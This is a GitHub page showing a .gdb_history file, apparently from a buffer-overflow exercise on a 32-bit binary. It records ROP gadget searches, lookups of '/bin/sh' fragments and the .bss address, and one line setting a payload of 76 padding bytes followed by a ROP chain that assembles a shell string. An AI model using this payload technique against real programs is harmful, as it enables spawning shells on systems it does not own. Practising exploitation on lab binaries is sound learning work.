-
Notifications
You must be signed in to change notification settings - Fork 60
/
Copy path.gdb_history
92 lines (92 loc) · 1.14 KB
/
.gdb_history
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
fin sh
b*main
r
find sh
find sh binary
file overflow
cler
clear
dumprop binary
ropsearch binary
b*main
r
ropsearch binary
ropsearch
ropsearch ""
ropsearch "pop"
ropsearch ""
ropsearch binary1
q
clear
b*main
r
clear
dumprop
ropsearch ""
clear
find /b
p strcpy
checksec
q
p bss
info address __bss_start
q
q
find "/b" binary
b*main
r
find "/b" binary
find "in/" binary
find "sh" binary
ropsearch "" binary
b*main
r
ropsearch "" binary
ropsearch "" binary | grep pop
ropsearch "" binary
set arg $(python -c 'print "A"*76 + "\x60\x83\x04\x08" + "\x2c\xa0\x04\x08" + "\x9e\x85\x04\x08" + "\x50\x83\x04\x08" + "\x2c\xa0\x04\x08" + "\x2c\xa0\x04\x08" + "\x29\x95\x04\x08" + "\x50\x83\x04\x08" + "\x50\x83\x04\x08" + "\x2c\xa0\x04\x08" + "\x96\x86\x04\x08"+ "\x80\x83\x04\x08" + "JUNK" + "\x2c\xa0\x04\x08"')
b*main
r
ni
q
file overflow
find /b binary
b*main
r
find /b binary
find in/ binary
find sh binary
q
file overflow
info addr __bss_start
zdq
q
q
q
clear
ls
clear
q
b*main
r
ropsearch "" binaru
ropsearch "" binary
clear
clear
ls
find "/b" binary
find "in/" binary
find "sh" binary
ropsearch "" binary
dd
q
b*main
r
celar
ls
ropsearch "" binary
q
clear
ls
clear
q